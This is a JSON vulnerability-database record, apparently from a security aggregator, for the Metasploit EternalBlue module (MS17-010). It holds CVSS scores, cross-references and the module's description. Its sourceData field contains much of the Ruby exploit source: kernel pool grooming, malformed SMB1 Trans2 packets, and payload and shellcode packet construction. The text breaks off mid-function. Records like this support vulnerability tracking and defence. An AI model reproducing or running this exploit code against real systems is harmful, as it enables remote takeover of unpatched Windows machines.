"exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "142f691ada068c40ae71fdd0eac8502e"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "79b03fa9178806f1694441cff96d84a3"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "a350165a58d78e6a7f1ec63091a5caba"}, {"key": "published", "hash": "c25dabffe89097874a062017ca347cc8"}, {"key": "references", "hash": "2a4acb977d851155649ad6e4f1698975"}, {"key": "reporter", "hash": "74798933f90c8c8a3dcac277d7c31e76"}, {"key": "title", "hash": "fe7cd07cb53ebe88d1bb8c3cb4d4de83"}, {"key": "type", "hash": "6719951e37a5b7c4b959f8df50c9d641"}], "scheme": null}, {"id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "hash": "8ee0b30d80e6b858e1e5e34e000a9f0bb0bf85330d3390f24f1a662b5f47c1c0", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption", "description": "This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. 
It seems like the pool will get hot streaks and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads.\n", "published": "2018-03-02T12:08:19", "modified": "2020-10-02T20:00:37", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://github.com/RiskSense-Ops/MS17-010"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "lastseen": "2020-10-07T20:17:30", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. 
This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-10-07T20:17:30", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", 
"RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"], "type": 
"malwarebytes"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-10-07T20:17:30", "rev": 2, "value": 7.7, "vector": "NONE"}}, "hash": "06b3984d879186ec915779309328127cf1c14fae881e41215a541e8693e50087", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "href"}, {"hash": "f01bc7580a1d9e48a4a0685bbba5abb4", "key": "title"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "74798933f90c8c8a3dcac277d7c31e76", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "e80bef8ab7c34172a2f61c17200cdbec", "key": "modified"}, {"hash": "f1292e4e1bddcf376f3f8330160fdd6b", "key": "references"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "type"}, {"hash": "142f691ada068c40ae71fdd0eac8502e", "key": "cvelist"}, {"hash": "e2dd14eb78ca67b48750e2bf14c1af6d", "key": "published"}, {"hash": "e399617d745f01fecac811333e03113c", "key": "description"}], "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", 
"immutableFields": [], "lastseen": "2020-10-07T20:17:30", "modified": "2020-10-02T20:00:37", "objectVersion": "1.5", "published": "2018-03-02T12:08:19", "references": ["https://github.com/RiskSense-Ops/MS17-010", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption", "type": "metasploit", "viewCount": 5795}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2020-10-07T20:17:30"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser,SMBPass, and SMBDomain options it will use those instead. 
On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads.", "enchantments": {}, "hash": "", "history": [], "href": "https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "lastseen": "2017-07-24T19:27:03", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb", "metasploitReliability": "Average", "modified": "2017-07-24T13:26:21", "objectVersion": "1.4", "published": "2017-05-16T20:40:03", "references": ["#", "http://cvedetails.com/cve/cve-2017-0144", "http://cvedetails.com/cve/cve-2017-0143", "https://github.com/RiskSense-Ops/MS17-010", "http://cvedetails.com/cve/cve-2017-0146", "http://cvedetails.com/cve/cve-2017-0148", "http://www.microsoft.com/technet/security/bulletin/MS17-010.mspx", "http://cvedetails.com/cve/cve-2017-0145", "http://cvedetails.com/cve/cve-2017-0147"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'ruby_smb'\nrequire 'ruby_smb/smb1/packet'\nrequire 'windows_error'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',\n 'Description' => %q{\n This module is a port of the Equation Group ETERNALBLUE exploit, part of\n the FuzzBunch toolkit released by Shadow Brokers.\n\n There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size\n is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a\n DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow\n is well laid-out to overwrite an SMBv1 buffer. 
Actual RIP hijack is later\n completed in srvnet!SrvNetWskReceiveComplete.\n\n This exploit, like the original may not trigger 100% of the time, and should be\n run continuously until triggered. It seems like the pool will get hot streaks\n and need a cool down period before the shells rain in again.\n\n The module will attempt to use Anonymous login, by default, to authenticate to perform the\n exploit. If the user supplies credentials in the SMBUser,SMBPass, and SMBDomain options it will use\n those instead.\n\n On some systems, this module may cause system instability and crashes, such as a BSOD or\n a reboot. This may be more likely with some payloads.\n },\n\n 'Author' => [\n 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0\n 'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius\n 'Equation Group',\n 'Shadow Brokers',\n 'thelightcosine' # RubySMB refactor and Fallback Credential mode\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'AKA', 'ETERNALBLUE' ],\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143' ],\n [ 'CVE', '2017-0144' ],\n [ 'CVE', '2017-0145' ],\n [ 'CVE', '2017-0146' ],\n [ 'CVE', '2017-0147' ],\n [ 'CVE', '2017-0148' ],\n [ 'URL', 'https://github.com/RiskSense-Ops/MS17-010' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 2000, # this can be more, needs to be recalculated\n 'EncoderType' => Msf::Encoder::Type::Raw,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows 7 and Server 2008 R2 (x64) All Service Packs',\n {\n 'Platform' => 'win',\n 'Arch' => [ ARCH_X64 ],\n\n 'os_patterns' => ['Server 2008 R2', 'Windows 7'],\n 'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset\n 'et_alertable' => 0x4c, # ETHREAD.Alertable offset\n 'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset\n 'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Mar 14 2017'\n ))\n\n register_options(\n [\n 
Opt::RPORT(445),\n OptString.new('ProcessName', [ true, 'Process to inject payload into.', 'spoolsv.exe' ]),\n OptInt.new( 'MaxExploitAttempts', [ true, \"The number of times to retry the exploit.\", 3 ] ),\n OptInt.new( 'GroomAllocations', [ true, \"Initial number of times to groom the kernel pool.\", 12 ] ),\n OptInt.new( 'GroomDelta', [ true, \"The amount to increase the groom count by per try.\", 5 ] ),\n OptBool.new( 'VerifyTarget', [ true, \"Check if remote OS matches exploit Target.\", true ] ),\n OptBool.new( 'VerifyArch', [ true, \"Check if remote architecture matches exploit Target.\", true ] ),\n OptString.new('SMBUser', [ false, '(Optional) The username to authenticate as', '']),\n OptString.new('SMBPass', [ false, '(Optional) The password for the specified username', '']),\n OptString.new('SMBDomain', [ false, '(Optional) The Windows domain to use for authentication', '.']),\n ])\n end\n\n class EternalBlueError < StandardError\n end\n\n def check\n # todo: create MS17-010 mixin, and hook up auxiliary/scanner/smb/smb_ms17_010\n end\n\n def exploit\n begin\n for i in 1..datastore['MaxExploitAttempts']\n\n grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)\n\n smb_eternalblue(datastore['ProcessName'], grooms)\n\n # we don't need this sleep, and need to find a way to remove it\n # problem is session_count won't increment until stage is complete :\\\n secs = 0\n while !session_created? 
and secs < 5\n secs += 1\n sleep 1\n end\n\n if session_created?\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n break\n else\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n end\n end\n\n rescue EternalBlueError => e\n print_error(\"#{e.message}\")\n rescue ::RubySMB::Error::UnexpectedStatusCode,\n ::Errno::ECONNRESET,\n ::Rex::HostUnreachable,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused => e\n print_error(\"#{e.class}: #{e.message}\")\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n ensure\n # pass\n end\n end\n\n def smb_eternalblue(process_name, grooms)\n begin\n # Step 0: pre-calculate what we can\n shellcode = make_kernel_user_payload(payload.encode, 0, 0, 0, 0, 0)\n payload_hdr_pkt = make_smb2_payload_headers_packet\n payload_body_pkt = make_smb2_payload_body_packet(shellcode)\n\n # Step 1: Connect to IPC$ share\n print_status(\"Connecting to target for exploitation.\")\n client, tree, sock, os = smb1_anonymous_connect_ipc()\n print_good(\"Connection established for exploitation.\")\n\n if verify_target(os)\n print_good('Target OS selected valid for OS indicated by SMB reply')\n else\n print_warning('Target OS selected not valid for OS indicated by SMB reply')\n print_warning('Disable VerifyTarget option to proceed manually...')\n raise EternalBlueError, 'Unable to continue with improper OS Target.'\n end\n\n # cool buffer print no matter what, will be helpful when people post debug issues\n print_core_buffer(os)\n\n if verify_arch\n print_good('Target arch selected valid for arch indicated by 
DCE/RPC reply')\n else\n print_warning('Target arch selected not valid for arch indicated by DCE/RPC reply')\n print_warning('Disable VerifyArch option to proceed manually...')\n raise EternalBlueError, 'Unable to continue with improper OS Arch.'\n end\n\n print_status(\"Trying exploit with #{grooms} Groom Allocations.\")\n\n # Step 2: Create a large SMB1 buffer\n print_status(\"Sending all but last fragment of exploit packet\")\n smb1_large_buffer(client, tree, sock)\n\n # Step 3: Groom the pool with payload packets, and open/close SMB1 packets\n print_status(\"Starting non-paged pool grooming\")\n\n # initialize_groom_threads(ip, port, payload, grooms)\n fhs_sock = smb1_free_hole(true)\n\n @groom_socks = []\n\n print_good(\"Sending SMBv2 buffers\")\n smb2_grooms(grooms, payload_hdr_pkt)\n\n fhf_sock = smb1_free_hole(false)\n\n print_good(\"Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.\")\n fhs_sock.shutdown()\n\n print_status(\"Sending final SMBv2 buffers.\") # 6x\n smb2_grooms(6, payload_hdr_pkt) # todo: magic #\n\n fhf_sock.shutdown()\n\n print_status(\"Sending last fragment of exploit packet!\")\n final_exploit_pkt = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_exploit, 15)\n sock.put(final_exploit_pkt)\n\n print_status(\"Receiving response from exploit packet\")\n code, raw = smb1_get_response(sock)\n\n code_str = \"0x\" + code.to_i.to_s(16).upcase\n if code.nil?\n print_error(\"Did not receive a response from exploit packet\")\n elsif code == 0xc000000d # STATUS_INVALID_PARAMETER (0xC000000D)\n print_good(\"ETERNALBLUE overwrite completed successfully (#{code_str})!\")\n else\n print_warning(\"ETERNALBLUE overwrite returned unexpected status code (#{code_str})!\")\n end\n\n # Step 4: Send the payload\n print_status(\"Sending egg to corrupted connection.\")\n\n @groom_socks.each{ |gsock| gsock.put(payload_body_pkt.first(2920)) }\n @groom_socks.each{ |gsock| gsock.put(payload_body_pkt[2920..(4204 - 0x84)]) }\n\n 
print_status(\"Triggering free of corrupted buffer.\")\n # tree disconnect\n # logoff and x\n # note: these aren't necessary, just close the sockets\n return true\n ensure\n abort_sockets\n end\n end\n\n def verify_target(os)\n os = os.gsub(\"\\x00\", '') # strip unicode bs\n os << \"\\x00\" # but original has a null\n ret = true\n\n if datastore['VerifyTarget']\n ret = false\n # search if its in patterns\n target['os_patterns'].each do |pattern|\n if os.downcase.include? pattern.downcase\n ret = true\n break\n end\n end\n end\n\n return ret\n end\n\n # https://github.com/CoreSecurity/impacket/blob/master/examples/getArch.py\n # https://msdn.microsoft.com/en-us/library/cc243948.aspx#Appendix_A_53\n def verify_arch\n ret = false\n\n return true if !datastore['VerifyArch']\n\n pkt = Rex::Proto::DCERPC::Packet.make_bind(\n # Abstract Syntax: EPMv4 V3.0\n 'e1af8308-5d1f-11c9-91a4-08002b14a0fa', '3.0',\n # Transfer Syntax[1]: 64bit NDR V1\n '71710533-beba-4937-8319-b5dbef9ccc36', '1.0'\n ).first\n\n begin\n sock = connect(false,\n 'RHOST' => rhost,\n 'RPORT' => 135\n )\n rescue Rex::ConnectionError => e\n print_error(e.to_s)\n return false\n end\n\n sock.put(pkt)\n\n begin\n res = sock.get_once(60)\n rescue EOFError\n print_error('DCE/RPC socket returned EOFError')\n return false\n end\n\n disconnect(sock)\n\n begin\n resp = Rex::Proto::DCERPC::Response.new(res)\n rescue Rex::Proto::DCERPC::Exceptions::InvalidPacket => e\n print_error(e.to_s)\n return false\n end\n\n case target_arch.first\n when ARCH_X64\n # Ack result: Acceptance (0)\n if resp.ack_result.first == 0\n ret = true\n end\n when ARCH_X86\n # Ack result: Provider rejection (2)\n # Ack reason: Proposed transfer syntaxes not supported (2)\n if resp.ack_result.first == 2 && resp.ack_reason.first == 2\n ret = true\n end\n end\n\n ret\n end\n\n def print_core_buffer(os)\n print_status(\"CORE raw buffer dump (#{os.length.to_s} bytes)\")\n\n count = 0\n chunks = os.scan(/.{1,16}/)\n chunks.each do | chunk |\n 
hexdump = chunk.chars.map { |ch| ch.ord.to_s(16).rjust(2, \"0\") }.join(\" \")\n\n format = \"0x%08x %-47s %-16s\" % [(count * 16), hexdump, chunk]\n print_status(format)\n count += 1\n end\n end\n\n #\n # Increase the default delay by five seconds since some kernel-mode\n # payloads may not run immediately.\n #\n def wfs_delay\n super + 5\n end\n\n\n def smb2_grooms(grooms, payload_hdr_pkt)\n grooms.times do |groom_id|\n gsock = connect(false)\n @groom_socks << gsock\n gsock.put(payload_hdr_pkt)\n end\n end\n\n def smb1_anonymous_connect_ipc\n sock = connect(false)\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, password: smb_pass)\n response_code = client.login\n\n unless response_code == ::WindowsError::NTStatus::STATUS_SUCCESS\n raise RubySMB::Error::UnexpectedStatusCode, \"Error with login: #{response_code.to_s}\"\n end\n os = client.peer_native_os\n\n tree = client.tree_connect(\"\\\\\\\\#{datastore['RHOST']}\\\\IPC$\")\n\n return client, tree, sock, os\n end\n\n def smb1_large_buffer(client, tree, sock)\n nt_trans_pkt = make_smb1_nt_trans_packet(tree.id, client.user_id)\n\n # send NT Trans\n vprint_status(\"Sending NT Trans Request packet\")\n\n client.send_recv(nt_trans_pkt)\n # Initial Trans2 request\n trans2_pkt_nulled = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_zero, 0)\n\n # send all but last packet\n for i in 1..14\n trans2_pkt_nulled << make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_buffer, i)\n end\n\n vprint_status(\"Sending malformed Trans2 packets\")\n sock.put(trans2_pkt_nulled)\n\n sock.get_once\n\n client.echo(count:1, data: \"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x00\")\n end\n\n def smb1_free_hole(start)\n sock = connect(false)\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, password: 
smb_pass)\n client.negotiate\n\n pkt = \"\"\n\n if start\n vprint_status(\"Sending start free hole packet.\")\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\xc0\", \"\\x2d\\x01\", \"\\xf0\\xff\\x00\\x00\\x00\")\n else\n vprint_status(\"Sending end free hole packet.\")\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\x40\", \"\\x2c\\x01\", \"\\xf8\\x87\\x00\\x00\\x00\")\n end\n\n client.send_recv(pkt)\n sock\n end\n\n def smb1_get_response(sock)\n raw = nil\n\n # dirty hack since it doesn't always like to reply the first time...\n 16.times do\n raw = sock.get_once\n break unless raw.nil? or raw.empty?\n end\n\n return nil unless raw\n response = RubySMB::SMB1::SMBHeader.read(raw[4..-1])\n code = response.nt_status\n return code, raw, response\n end\n\n def make_smb2_payload_headers_packet\n # don't need a library here, the packet is essentially nonsensical\n pkt = \"\"\n pkt << \"\\x00\" # session message\n pkt << \"\\x00\\xff\\xf7\" # size\n pkt << \"\\xfeSMB\" # SMB2\n pkt << \"\\x00\" * 124\n\n pkt\n end\n\n def make_smb2_payload_body_packet(kernel_user_payload)\n # precalculated lengths\n pkt_max_len = 4204\n pkt_setup_len = 497\n pkt_max_payload = pkt_max_len - pkt_setup_len # 3575\n\n # this packet holds padding, KI_USER_SHARED_DATA addresses, and shellcode\n pkt = \"\"\n\n # padding\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x03\\x00\\x00\\x00\"\n pkt << \"\\x00\" * 0x1c\n pkt << \"\\x03\\x00\\x00\\x00\"\n pkt << \"\\x00\" * 0x74\n\n # KI_USER_SHARED_DATA addresses\n pkt << \"\\xb0\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\" * 2 # x64 address\n pkt << \"\\x00\" * 0x10\n pkt << \"\\xc0\\xf0\\xdf\\xff\" * 2 # x86 address\n pkt << \"\\x00\" * 0xc4\n\n # payload addreses\n pkt << \"\\x90\\xf1\\xdf\\xff\"\n pkt << \"\\x00\" * 0x4\n pkt << \"\\xf0\\xf1\\xdf\\xff\"\n pkt << \"\\x00\" * 0x40\n\n pkt << \"\\xf0\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x00\\x02\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\"\n\n pkt << 
